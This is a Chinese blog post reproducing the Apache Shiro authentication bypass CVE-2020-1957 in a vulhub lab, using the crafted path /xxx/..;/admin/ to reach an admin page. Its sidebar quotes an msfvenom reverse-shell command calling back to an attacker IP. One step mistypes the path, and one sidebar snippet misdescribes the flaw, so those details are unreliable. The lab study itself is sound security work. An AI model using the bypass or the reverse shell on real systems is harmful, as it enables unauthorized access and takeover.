Shiro 权限绕过漏洞(CVE-2020-1957)

最新推荐文章于 2023-11-01 10:23:38 发布
最新推荐文章于 2023-11-01 10:23:38 发布
阅读量1k 收藏 1
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/125635446
版权

Shiro 权限绕过漏洞(CVE-2020-1957)

漏洞原理

Spring Boot中使用 Apache Shiro 进行身份验证、权限控制时,利用 Apache Shiro 和 Spring Boot 对URL的处理的不同,实现越权访问。
比如/xxx/..;/admin/这个路径,在shiro看到“;”分号后,就会进行截断,校验分号前面路径/xxx/..这个路径并没有包含admin/**于是校验通过。Spring Boot看到此路径后,会直接取有效路径/admin/于是就访问成功了。

参考:

https://paper.seebug.org/1196/

https://blog.csdn.net/huangyongkang666/article/details/124176969

思考:为什么/xxx/..后面必须是两个点“.”

影响版本

Apache Shiro < 1.5.1

漏洞复现

环境:
docker环境下vulhub靶场

  1. 访问靶机
    在这里插入图片描述
    点击按钮发现一个登录界面,登陆后有一个界面
    在这里插入图片描述
    登录成功后的界面
    在这里插入图片描述
    在这里插入图片描述
    发现一个新的目录/admin,需要登录后才能访问。
    我们要做的就是利用Shiro 权限绕过漏洞(CVE-2020-1957)绕过登录,访问后台/admin目录。
  2. 抓包,访问/admin发现拒绝访问302
    在这里插入图片描述
  3. 了解漏洞原理后,直接构造url,访问/ddd/...;/admin/
    在这里插入图片描述
    访问成功!
Day_0713
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2020-1957 Apache Shiro 认证绕过漏洞
m0_61506558的博客
09-17 1653
(一)介绍(一)介绍Apache Shiro是一款开源安全框架,它的功能主要用于身份验证、授权、会话管理、加密......漏洞发生原因是:登入的时候序列化保存了登入信息到cookie(序列化、AES加密、Base64)
CVE-2020-1957 漏洞复现
最新发布
huohaowen的博客
06-19 352
在一开始翻阅了CSDN之后,发现不同文章之间存在出入,于是最后去了CVE的官方文档,和参考一些国外的底层代码审计人员的报告,发现原理和CSDN上的部分文章存在出入,但是POC是相同的。在新版本的Shiro中GetRequestURL是由contextPath()+ servletPath()+ pathinfo() 这三个函数组合而成,当黑客传入。POC之后,在Shiro的过滤之下,返回的路径将会变成/admin/成功匹配,不会放行,成功防止了权限绕过。然后我们用我们的POC去访问,成功绕过身份验证。
Apache Shiro 越权访问漏洞 CVE-2020-1957 漏洞复现
qq_44484541的博客
11-01 387
CVE-2020-1957,Spring Boot中使用 Apache Shiro 进行身份验证、权限控制时,可以精心构造恶意的URL,利用 Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过 Apache Shiro 对 Spring Boot 中的 Servlet 的权限控制,越权并实现未授权访问。/admin/ , 最终请求 /admin/, 成功访问了后台请求。构造恶意请求url:http://ip:port/xxx/…/admin/,访问到管理页面,越权成功。
[详细]Apache Shiro身份验证越权漏洞[CVE-2016-6802][CVE-2020-1957]
qq_60115503的博客
11-07 2640
Apache Shiro是一个强大且易用的java安全框架,执行身份验证,授权,密码和会话管理,使用Shiro的API,可以快速获取任何应用程,从最小的移动应用到最大的网络和企业应用程序。
CVE-2020-1957 Apache Shiro 认证绕过漏洞复现
weixin_55821558的博客
07-16 691
CVE-2020-1957,SpringBoot中使用ApacheShiro进行身份验证、权限控制时,可以精心构造恶意的URL,利用ApacheShiro和SpringBoot对URL的处理的差异化,可以绕过ApacheShiro对SpringBoot中的Servlet的权限控制,越权并实现未授权访问。是一款开源安全框架,提供身份验证、授权、密码学和会话管理。在重放这个模块GET/HTTP/1.1==>GET/adminHTTP/1.1。...
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
然而,如标题和描述中提到的,存在一个名为CVE-2020-1957的安全漏洞,允许攻击者绕过Shiro权限检查,从而访问受保护的资源。 该漏洞主要发生在Shiro 1.5.1及更早版本中,当用户请求的URL(URL1)通过Shiro权限...
shiro-cve-2020-17523:shiro-cve-2020-17523 漏洞的两种绕过姿势分析 以及配套的漏洞环境
05-23
Apache Shiro 两种姿势绕过认证分析(CVE-2020-17523) 0x01 漏洞描述 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何...
S17-shiro权限绕过1
08-03
在本文中,我们将深入探讨 "S17-shiro权限绕过1" 的相关知识,包括 Shiro 的核心组件、权限配置以及可能存在的安全漏洞。 首先,我们需要理解 Shiro 的主要组件: 1. **Realm**: Realm 是 Shiro 与应用程序特定...
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可导致...
【技术分享】Shiro 权限绕过的历史线(下) .pdf
09-05
在本文中,我们将深入探讨Shiro权限绕过漏洞CVE-2020-13933,这是继CVE-2020-1957和CVE-2020-11989之后的一个新发现。 **0x5 CVE-2020-13933 - 权限绕过漏洞** 该漏洞影响Shiro的1.6.0之前的版本,主要通过URL解码...
Shiro安全(四):Shiro权限绕过Shiro-782
weixin_43263451的博客
08-07 1726
刚好在学shiro安全,就看了看shiro权限绕过方面的洞学习一下shiro的配置与使用https://cloud.tencent.com/developer/article/1643122影响版本:shiro < 1.5.3添加shiro配置Shiro 中的匹配规则是通过 AntPathMatcher 来进行实现的? 匹配一个字符 * 匹配一个或多个字符 ** 匹配一个或多个目录ps:这里的规则是 /admin/* 所以 Shiro 并不会对多个目录进行权限校验,例如:/admin/aaa/bbb 这
Shiro权限绕过漏洞CVE-2020-1957,CVE-2020-11989、CVE-2020-13933)
weixin_46411728的博客
07-22 1361
Shiro权限绕过漏洞CVE-2020-1957,CVE-2020-11989、CVE-2020-13933)
Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989)
文公子的博客
11-03 3372
Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) Apache Shiro是一个强大且易用的Java安全框架,它可以用来执行身份验证、授权、密码和会话管理。目前常见集成于各种应用中进行身份验证,授权等。 漏洞详情 腾讯安全玄武实验室研究员发现在Apache Shiro 1.5.3之前的版本,将Apache Shiro与Spring控制器一起使用时,特制请求可能会导致身份验证绕过漏洞发现者 该漏洞由腾讯安全玄武实验室的Ruilin发现并报告,此外来自边界无限的淚笑也独立向官方报
shiro权限绕过
人若有志,就不会在半坡停止。
11-08 2126
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
Shiro 身份验证绕过CVE-2020-13933)
weixin_46801402的博客
11-01 496
Shiro 身份验证绕过CVE-2020-13933)
Apache Shiro 认证绕过漏洞CVE-2020-1957)
黑白的博客
05-11 1504
声明 好好学习,天天向上 漏洞描述 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造..;这样的跳转,可以绕过Shiro中对目录的权限限制。 影响范围 Apache Shiro < 1.5.3 复现过程 这里使用1.5.1版本 使用vulhub /app/vulhub/vulhub-master/shiro/CVE-2
CVE-2020-1938(RCE利用)
热门推荐
午夜安全
03-27 1万+
CVE-2020-1938(RCE利用) 1.使用msf生成反弹shell马,并且监听 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png 假设利用上传点,把此图片上传到了目标服务器/log/shell.png。 在msf监听: msf > use expl...
shiro认证绕过CVE-2020-(1957,17523)
守拙的博客
08-12 1115
Apache Shiro多个版本中存在认证绕过漏洞。攻击者可构造特殊的请求绕过身份验证访问目标服务。
Apache Shiro 目录穿越漏洞 CVE-2023-34478
07-29
很抱歉,但我没有找到关于Apache Shiro目录穿越漏洞CVE-2023-34478的相关信息。根据我所了解的情况,Apache Shiro在2022年6月29日披露了一个权限绕过漏洞CVE-2022-32532),该漏洞可能导致未经授权的远程攻击者绕过身份认证。Apache官方已发布修复此漏洞的版本,并建议用户尽快升级至Apache Shiro 1.9.1及以上版本以确保安全。\[1\]\[2\]\[3\] 请注意,我的回答是基于提供的引用内容,如果有任何其他信息或更新,请参考官方渠道获取最新信息。 #### 引用[.reference_title] - *1* *3* [[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)](https://blog.csdn.net/qq_51577576/article/details/126155240)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Apache Shiro权限绕过漏洞CVE-2022-32532)](https://blog.csdn.net/weixin_54438700/article/details/128324850)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值